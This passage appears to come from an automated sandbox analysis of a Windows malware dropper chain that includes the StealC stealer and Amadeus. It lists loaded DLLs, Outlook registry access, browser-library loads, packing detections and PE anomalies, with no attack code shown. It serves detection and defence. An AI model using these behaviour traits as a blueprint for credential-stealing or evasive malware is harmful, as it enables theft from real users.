Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: apphelp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: powrprof.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static file information: File size 1934336 > 1048576

Source: file.exe

Static PE information: Raw size of afdpsowp is bigger than: 0x100000 < 0x1a6800

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000016.00000002.2301366452.000000006C8CD000.00000002.00000001.01000000.0000001A.sdmp, svchost015.exe, 00000019.00000002.2566561207.000000006C02D000.00000002.00000001.01000000.0000001A.sdmp, mozglue[1].dll.25.dr, mozglue[1].dll.22.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.22.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.22.dr
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr
Source:	Binary string: c:\rje\tg\3fl4\obj\Re\ease\etf.pdb source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdb source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 0000001E.00000000.2408541214.00000000001B2000.00000002.00000001.01000000.0000001F.sdmp, runtime.exe.32.dr
Source:	Binary string: BitLockerToGo.pdb source: Amadeus.exe, 0000001B.00000002.2558300880.0000000001894000.00000004.00001000.00020000.00000000.sdmp, Amadeus.exe, 00000026.00000002.2741849843.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdbb source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 0000001E.00000000.2408541214.00000000001B2000.00000002.00000001.01000000.0000001F.sdmp, runtime.exe.32.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.22.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.25.dr
Source:	Binary string: c:\rje\tg\bj\Re\ease\gqa.pdb source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000016.00000002.2301366452.000000006C8CD000.00000002.00000001.01000000.0000001A.sdmp, svchost015.exe, 00000019.00000002.2566561207.000000006C02D000.00000002.00000001.01000000.0000001A.sdmp, mozglue[1].dll.25.dr, mozglue[1].dll.22.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: Amadeus.exe, 0000001B.00000002.2558300880.0000000001894000.00000004.00001000.00020000.00000000.sdmp, Amadeus.exe, 00000026.00000002.2741849843.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.22.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.800000.0.unpack :EW;.rsrc:W;.idata :W; :EW;afdpsowp:EW;loqpciws:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;afdpsowp:EW;loqpciws:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.1b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;afdpsowp:EW;loqpciws:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;afdpsowp:EW;loqpciws:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 7.2.axplong.exe.1b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;afdpsowp:EW;loqpciws:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;afdpsowp:EW;loqpciws:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: runtime[1].exe.7.dr, CalculatorForm1.cs	.Net Code: FixLayout System.Reflection.Assembly.Load(byte[])
Source: runtime.exe.7.dr, CalculatorForm1.cs	.Net Code: FixLayout System.Reflection.Assembly.Load(byte[])

Source: runtime[1].exe.7.dr

Static PE information: 0xBA490597 [Mon Jan 14 00:08:55 2069 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_0049BDF9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_0049BDF9

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: runtime[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x10013
Source: Nework[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: build[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x68612
Source: crypteda[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1e1e49 should be: 0x1e6d73
Source: crypteda.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: stealc_default2.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x31181
Source: file.exe	Static PE information: real checksum: 0x1e1e49 should be: 0x1e6d73
Source: stealc_default2[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x31181
Source: Nework.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: runtime.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x10013

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: afdpsowp
Source: file.exe	Static PE information: section name: loqpciws
